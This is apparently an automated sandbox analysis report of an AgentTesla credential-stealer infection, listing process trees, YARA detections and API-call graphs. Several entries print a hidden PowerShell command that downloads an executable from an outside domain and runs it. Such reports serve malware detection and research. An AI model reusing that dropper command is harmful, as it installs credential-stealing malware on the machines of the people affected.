                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                                                          Imagebase:0x13f9e0000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.436663453.0000000000380000.00000004.00000020.sdmp, Author: Florian Roth
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: powershell.exe PID: 1308 Parent PID: 2724

                                                          General

                                                          Start time:10:22:29
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                                                          Imagebase:0x13f9e0000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmp, Author: Florian Roth
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: powershell.exe PID: 292 Parent PID: 2724

                                                          General

                                                          Start time:10:22:29
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                                                          Imagebase:0x13f9e0000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: okcff.exe PID: 2656 Parent PID: 292

                                                          General

                                                          Start time:10:22:34
                                                          Start date:14/01/2022
                                                          Path:C:\Users\user\AppData\Roaming\okcff.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Roaming\okcff.exe"
                                                          Imagebase:0x9f0000
                                                          File size:194560 bytes
                                                          MD5 hash:E9416A322E9A796D45588BC4FB04CD45
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.623662053.000000000356F000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.621443805.00000000023AD000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.621033509.0000000001E30000.00000004.00020000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 2028 Parent PID: 2656

                                                          General

                                                          Start time:10:22:37
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a190000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: timeout.exe PID: 1972 Parent PID: 2028

                                                          General

                                                          Start time:10:22:37
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x9f0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 2104 Parent PID: 2656

                                                          General

                                                          Start time:10:22:41
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a6d0000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: timeout.exe PID: 2060 Parent PID: 2104

                                                          General

                                                          Start time:10:22:42
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x2e0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 1864 Parent PID: 2656

                                                          General

                                                          Start time:10:22:44
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a270000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: timeout.exe PID: 2100 Parent PID: 1864

                                                          General

                                                          Start time:10:22:45
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x6e0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 1892 Parent PID: 2656

                                                          General

                                                          Start time:10:22:47
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a030000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: verclsid.exe PID: 2432 Parent PID: 2724

                                                          General

                                                          Start time:10:22:48
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\verclsid.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                                          Imagebase:0xff0a0000
                                                          File size:11776 bytes
                                                          MD5 hash:3796AE13F680D9239210513EDA590E86
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: timeout.exe PID: 2780 Parent PID: 1892

                                                          General

                                                          Start time:10:22:48
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0xf0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: notepad.exe PID: 2652 Parent PID: 2724

                                                          General

                                                          Start time:10:22:50
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\notepad.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                          Imagebase:0xff910000
                                                          File size:193536 bytes
                                                          MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 2712 Parent PID: 2656

                                                          General

                                                          Start time:10:22:51
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a7b0000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: timeout.exe PID: 2228 Parent PID: 2712

                                                          General

                                                          Start time:10:22:52
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x6b0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 448 Parent PID: 2656

                                                          General

                                                          Start time:10:22:54
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a2a0000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: timeout.exe PID: 2632 Parent PID: 448

                                                          General

                                                          Start time:10:22:55
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x4e0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 2792 Parent PID: 2656

                                                          General

                                                          Start time:10:22:59
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4ac50000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: timeout.exe PID: 1188 Parent PID: 2792

                                                          General

                                                          Start time:10:23:00
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0xae0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 836 Parent PID: 2656

                                                          General

                                                          Start time:10:23:04
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a970000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: timeout.exe PID: 1308 Parent PID: 836

                                                          General

                                                          Start time:10:23:05
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0xe80000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 2424 Parent PID: 2656

                                                          General

                                                          Start time:10:23:09
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a700000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: timeout.exe PID: 1204 Parent PID: 2424

                                                          General

                                                          Start time:10:23:10
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x4f0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: okcff.exe PID: 2176 Parent PID: 2656

                                                          General

                                                          Start time:10:23:54
                                                          Start date:14/01/2022
                                                          Path:C:\Users\user\AppData\Roaming\okcff.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\okcff.exe
                                                          Imagebase:0x9f0000
                                                          File size:194560 bytes
                                                          MD5 hash:E9416A322E9A796D45588BC4FB04CD45
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                          Chronological Activities

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >

                                                            Analysis Process: powershell.exe PID: 2904 Parent PID: 2724 powershell.exeCOMMON

                                                            Executed Functions

                                                            Function 000007FF002506E5, Relevance: .2, Instructions: 239COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.445609977.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ff00250000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bcaa293e62f3733eb495f5cedfb4bd3383b67c20c644fa42089654e521e3f1a9
                                                            • Instruction ID: 56bf1851979f55b404266dd9a3aa6ee9bcb5224752dda6fbc888646c8fd107c1
                                                            • Opcode Fuzzy Hash: bcaa293e62f3733eb495f5cedfb4bd3383b67c20c644fa42089654e521e3f1a9
                                                            • Instruction Fuzzy Hash: CD51AC2190EBC24FEB435B785C662A17FB0AF17211B1E00FBC489CB0A3D95C9D5AC762
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 000007FF002513E1, Relevance: .1, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.445609977.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ff00250000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a879594db50d2a162a6a118a21c4f3fa444984294920631cc16567c24d0a81d3
                                                            • Instruction ID: 41091b0fd9d18a46f4c18e4a9fa3d91fed66c4a10f74c71a94700b2278564b9b
                                                            • Opcode Fuzzy Hash: a879594db50d2a162a6a118a21c4f3fa444984294920631cc16567c24d0a81d3
                                                            • Instruction Fuzzy Hash: EA1198A240E7C58FD70347786CA46913FB1AE57264B4E02C7E8C4CA0E3E5181A9AC322
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Analysis Process: powershell.exe PID: 1308 Parent PID: 2724 powershell.exeCOMMON

                                                            Executed Functions

                                                            Function 000007FF002506E5, Relevance: .2, Instructions: 216COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.447776016.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9096ba6876949434c808a1683598a2754ab07123e7f2496ecd194c084e4f58d7
                                                            • Instruction ID: 6bf683cde81855fc13dbc068bca89daf0805730a8da33d518115b17b8d96b732
                                                            • Opcode Fuzzy Hash: 9096ba6876949434c808a1683598a2754ab07123e7f2496ecd194c084e4f58d7
                                                            • Instruction Fuzzy Hash: 92417B5190EBC20FE7535B749C696617FA0AF1B311F1E00FBD488CB0A3E9589859C762
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Analysis Process: okcff.exe PID: 2656 Parent PID: 292 okcff.exeCOMMON

                                                            Execution Graph

                                                            Execution Coverage:16.3%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:1.3%
                                                            Total number of Nodes:223
                                                            Total number of Limit Nodes:9

                                                            Graph

                                                            execution_graph 41465 21a8988 41466 21a89cc VirtualAllocEx 41465->41466 41468 21a8a44 41466->41468 41645 21ac43d 41646 21ac850 EnumChildWindows 41645->41646 41648 21ac8c1 41646->41648 41649 2113f79 41650 2113f15 41649->41650 41651 2113f77 41650->41651 41653 2113fb8 41650->41653 41654 2113fde 41653->41654 41655 2114024 41654->41655 41661 2116f18 41654->41661 41666 211d3a1 41654->41666 41676 211d4b0 41654->41676 41685 211d3b0 41654->41685 41695 2116f07 41654->41695 41655->41650 41662 2116f22 41661->41662 41663 2116f5e 41662->41663 41700 21173b8 41662->41700 41704 21173a8 41662->41704 41663->41655 41668 211d3b0 41666->41668 41667 211d3c1 41667->41655 41668->41667 41669 211d44c 41668->41669 41671 211d471 41668->41671 41675 211d4b0 12 API calls 41669->41675 41670 211d46d 41670->41655 41708 21a7a30 41671->41708 41712 21a7a80 41671->41712 41675->41670 41677 211d483 41676->41677 41679 211d4be 41676->41679 41683 21a7a30 12 API calls 41677->41683 41684 21a7a80 12 API calls 41677->41684 41678 211d4a7 41678->41655 41680 21173b8 12 API calls 41679->41680 41682 211d65d 41679->41682 41681 211d653 41680->41681 41681->41655 41682->41655 41683->41678 41684->41678 41687 211d3b8 41685->41687 41686 211d3c1 41686->41655 41687->41686 41688 211d44c 41687->41688 41690 211d471 41687->41690 41692 211d4b0 12 API calls 41688->41692 41689 211d46d 41689->41655 41693 21a7a30 12 API calls 41690->41693 41694 21a7a80 12 API calls 41690->41694 41691 211d4a7 41691->41655 41692->41689 41693->41691 41694->41691 41696 2116f22 41695->41696 41697 2116f5e 41696->41697 41698 21173b8 12 API calls 41696->41698 41699 21173a8 12 API calls 41696->41699 41697->41655 41698->41697 41699->41697 41702 21173df 41700->41702 41701 21175bb 41702->41701 41703 2115330 12 API calls 41702->41703 41703->41701 41706 21173df 41704->41706 41705 2115330 12 API calls 41707 21175bb 41705->41707 41706->41705 41706->41707 41709 21a7aa8 41708->41709 41711 211d4b0 12 API calls 41709->41711 41710 21a7b8d 41711->41710 41713 21a7aa8 41712->41713 41715 211d4b0 12 API calls 41713->41715 41714 21a7b8d 41715->41714 41716 2118378 41719 211837b 41716->41719 41717 21173b8 12 API calls 41718 2118479 41717->41718 41719->41717 41720 2118481 41719->41720 41469 21149cb 41470 21149f8 41469->41470 41471 2114b46 41470->41471 41474 2115330 41470->41474 41488 211531f 41470->41488 41477 211535d 41474->41477 41475 2115368 41475->41471 41476 2115507 41476->41471 41477->41475 41502 2162047 41477->41502 41507 21617b9 41477->41507 41520 21616f8 41477->41520 41533 2161c60 41477->41533 41538 2161630 41477->41538 41551 2161610 41477->41551 41564 2161c03 41477->41564 41569 2161ae3 41477->41569 41579 21616c5 41477->41579 41592 2162214 41477->41592 41491 211535d 41488->41491 41489 2115368 41489->41471 41490 2115507 41490->41471 41491->41489 41492 2162047 2 API calls 41491->41492 41493 2162214 2 API calls 41491->41493 41494 21616c5 8 API calls 41491->41494 41495 2161ae3 6 API calls 41491->41495 41496 2161c03 2 API calls 41491->41496 41497 2161610 8 API calls 41491->41497 41498 2161630 8 API calls 41491->41498 41499 2161c60 2 API calls 41491->41499 41500 21616f8 8 API calls 41491->41500 41501 21617b9 8 API calls 41491->41501 41492->41490 41493->41490 41494->41490 41495->41490 41496->41490 41497->41490 41498->41490 41499->41490 41500->41490 41501->41490 41503 2162078 41502->41503 41597 21a9288 41503->41597 41601 21a9287 41503->41601 41504 21620c1 41510 21617ba 41507->41510 41508 2161bb2 41509 2161d3a 41508->41509 41631 21ab310 41508->41631 41634 21ab30a 41508->41634 41509->41476 41511 2161a47 41510->41511 41605 21a8d00 41510->41605 41609 21a8cf4 41510->41609 41511->41508 41613 21a7ed3 41511->41613 41617 21a9d90 41511->41617 41622 21a7eb8 41511->41622 41627 21a7e63 41511->41627 41521 2161720 41520->41521 41522 2161a47 41521->41522 41529 21a8d00 CreateProcessA 41521->41529 41530 21a8cf4 CreateProcessA 41521->41530 41524 2161bb2 41522->41524 41525 21a7eb8 K32EnumProcesses 41522->41525 41526 21a7e63 K32EnumProcesses 41522->41526 41527 21a7ed3 K32EnumProcesses 41522->41527 41528 21a9d90 K32EnumProcesses 41522->41528 41523 2161d3a 41523->41476 41524->41523 41531 21ab30a K32EnumProcessModules 41524->41531 41532 21ab310 K32EnumProcessModules 41524->41532 41525->41524 41526->41524 41527->41524 41528->41524 41529->41522 41530->41522 41531->41523 41532->41523 41534 2161c89 41533->41534 41535 2161d3a 41533->41535 41534->41535 41536 21ab30a K32EnumProcessModules 41534->41536 41537 21ab310 K32EnumProcessModules 41534->41537 41535->41476 41536->41535 41537->41535 41542 2161654 41538->41542 41539 2161a47 41540 2161bb2 41539->41540 41547 21a7eb8 K32EnumProcesses 41539->41547 41548 21a7e63 K32EnumProcesses 41539->41548 41549 21a7ed3 K32EnumProcesses 41539->41549 41550 21a9d90 K32EnumProcesses 41539->41550 41541 2161d3a 41540->41541 41545 21ab30a K32EnumProcessModules 41540->41545 41546 21ab310 K32EnumProcessModules 41540->41546 41541->41476 41542->41539 41543 21a8d00 CreateProcessA 41542->41543 41544 21a8cf4 CreateProcessA 41542->41544 41543->41539 41544->41539 41545->41541 41546->41541 41547->41540 41548->41540 41549->41540 41550->41540 41554 2161630 41551->41554 41552 2161bb2 41553 2161d3a 41552->41553 41556 21ab30a K32EnumProcessModules 41552->41556 41557 21ab310 K32EnumProcessModules 41552->41557 41553->41476 41555 2161a47 41554->41555 41562 21a8d00 CreateProcessA 41554->41562 41563 21a8cf4 CreateProcessA 41554->41563 41555->41552 41558 21a7eb8 K32EnumProcesses 41555->41558 41559 21a7e63 K32EnumProcesses 41555->41559 41560 21a7ed3 K32EnumProcesses 41555->41560 41561 21a9d90 K32EnumProcesses 41555->41561 41556->41553 41557->41553 41558->41552 41559->41552 41560->41552 41561->41552 41562->41555 41563->41555 41565 2161c04 41564->41565 41566 2161d3a 41565->41566 41567 21ab30a K32EnumProcessModules 41565->41567 41568 21ab310 K32EnumProcessModules 41565->41568 41566->41476 41567->41566 41568->41566 41570 2161ae4 41569->41570 41571 2161bb2 41570->41571 41575 21a7eb8 K32EnumProcesses 41570->41575 41576 21a7e63 K32EnumProcesses 41570->41576 41577 21a7ed3 K32EnumProcesses 41570->41577 41578 21a9d90 K32EnumProcesses 41570->41578 41572 2161d3a 41571->41572 41573 21ab30a K32EnumProcessModules 41571->41573 41574 21ab310 K32EnumProcessModules 41571->41574 41572->41476 41573->41572 41574->41572 41575->41571 41576->41571 41577->41571 41578->41571 41583 21616c6 41579->41583 41580 2161a47 41581 2161bb2 41580->41581 41588 21a7eb8 K32EnumProcesses 41580->41588 41589 21a7e63 K32EnumProcesses 41580->41589 41590 21a7ed3 K32EnumProcesses 41580->41590 41591 21a9d90 K32EnumProcesses 41580->41591 41582 